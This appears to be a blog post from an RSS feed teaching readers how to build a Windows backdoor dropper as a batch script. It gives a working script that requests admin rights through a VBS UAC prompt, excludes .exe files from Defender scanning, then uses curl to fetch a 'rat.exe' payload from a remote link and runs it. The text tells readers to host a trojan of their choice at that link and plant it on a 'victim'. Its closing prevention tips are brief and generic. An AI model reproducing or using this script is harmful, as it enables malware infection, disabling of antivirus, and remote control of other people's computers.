<h2 id="ftoc-cach-tao-backdoor-don-gian-chi-voi-mot-tap-lenh-batch" class="ftwp-heading"><span style="font-size: 14pt; color: #0000ff;"><strong>How to Create a Simple Backdoor with Just One Batch Script</strong></span></h2>
<p>To create a Backdoor, first create a file with the extension .bat and then copy the following code</p>
<p><img decoding="async" class="aligncenter wp-image-44616 size-full" src="https://anonyviet.com/wp-content/uploads/2023/01/carbon.png" alt="create simple Backdoor with Bacth file" width="1024" height="767" srcset="https://anonyviet.com/wp-content/uploads/2023/01/carbon.png 1024w, https://anonyviet.com/wp-content/uploads/2023/01/carbon-300x225.png 300w, https://anonyviet.com/wp-content/uploads/2023/01/carbon-768x575.png 768w, https://anonyviet.com/wp-content/uploads/2023/01/carbon-750x562.png 750w" sizes="(max-width: 1024px) 100vw, 1024px" title="How to create a simple Backdoor with CMD 6"/></p>
<pre class="EnlighterJSRAW" data-enlighter-language="bat">@echo off&#13;
&#13;
&gt;nul 2&gt;&amp;1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"&#13;
&#13;
if '%errorlevel%' NEQ '0' (&#13;
    goto UACPrompt&#13;
) else ( goto gotAdmin )&#13;
&#13;
:UACPrompt&#13;
    echo Set UAC = CreateObject^("Shell.Application"^) &gt; "%temp%\getadmin.vbs"&#13;
    set params = %*:"=""&#13;
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 &gt;&gt; "%temp%\getadmin.vbs"&#13;
&#13;
    "%temp%\getadmin.vbs"&#13;
    del "%temp%\getadmin.vbs"&#13;
    exit /B&#13;
&#13;
:gotAdmin&#13;
    pushd "%CD%"&#13;
    CD /D "%~dp0"&#13;
Powershell -Command "Set-MpPreference -ExclusionExtension exe"&#13;
cd %TEMP%&#13;
curl "paste link backdoor của bạn ở đây" -o rat.exe&#13;
rat.exe</pre>
<p>In the above code, we need to change a bit in the second line of code from the bottom, please create a direct download link to your computer, make sure that the link contains trojan virus, malware, etc. you want, next name the backdoor that you want to download to the victim&#8217;s computer, I&#8217;ll name it <code>rat.exe</code> So we have created the Backdoor.  Now I will explain how it works</p>
<p><em><strong>The way it works is as follows:</strong></em></p>
<p>This script grants administrator privileges, then downloads and executes a file named “rat.exe” from a remote server. First, I used the cacls command to check the above permissions. the system file is located at “%SYSTEMROOT%\system32\config\system”.  If the command fails, the script will switch to the UACPrompt label, which will generate a VB (Visual Basic) script that prompts the victim to run the script with administrator privileges.  If the cacls command gives no errors then the script jumps to the gotAdmin label and proceeds to execute the rest.  We can see that the label gotAdmin changes to the directory containing the pushd and CD commands.  It will then run a PowerShell command to set the option for file exclusion extensions to exe.  Finally, it switches to the %TEMP% directory and uses the curl command to download “rat.exe” from a remote server.  It will then run the downloaded file using the rat.exe command.</p>
<p>Thus, this Backdoor works very simply, if the machine installs 2 or more Antivirus, this Backdoor becomes useless and the victim will detect it.  Here are some ways to prevent Backdoor for everyone to know and avoid</p>
<h2 id="ftoc-cach-phong-chong-backdoor" class="ftwp-heading"><span style="color: #0000ff;"><strong><span style="font-size: 14pt;">How to prevent Backdoor</span></strong></span></h2>
<p>1.Verify the origin and authenticity of any file or program before running</p>
<p>2.Update the latest anti-virus software versions</p>
<p>3.Do not download unknown software</p>
<p>4.Use Firewall</p>
<p>This is the end of the article, I hope you learn something from this article.  Wishing you all a very nice day!</p>
</p>
<p><em><strong>You can also read more articles <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fvillain-bypass-antivirus-chiem-quyen-shell-windows-va-linux%2F" class="local-link" rel="noopener">Villain – Bypass AntiVirus hijacks Windows and Linux shells</a> at website Anonyviet.com</strong></em></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;44615&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-create-a-simple-backdoor-with-cmd/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/01/backdoor-2.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
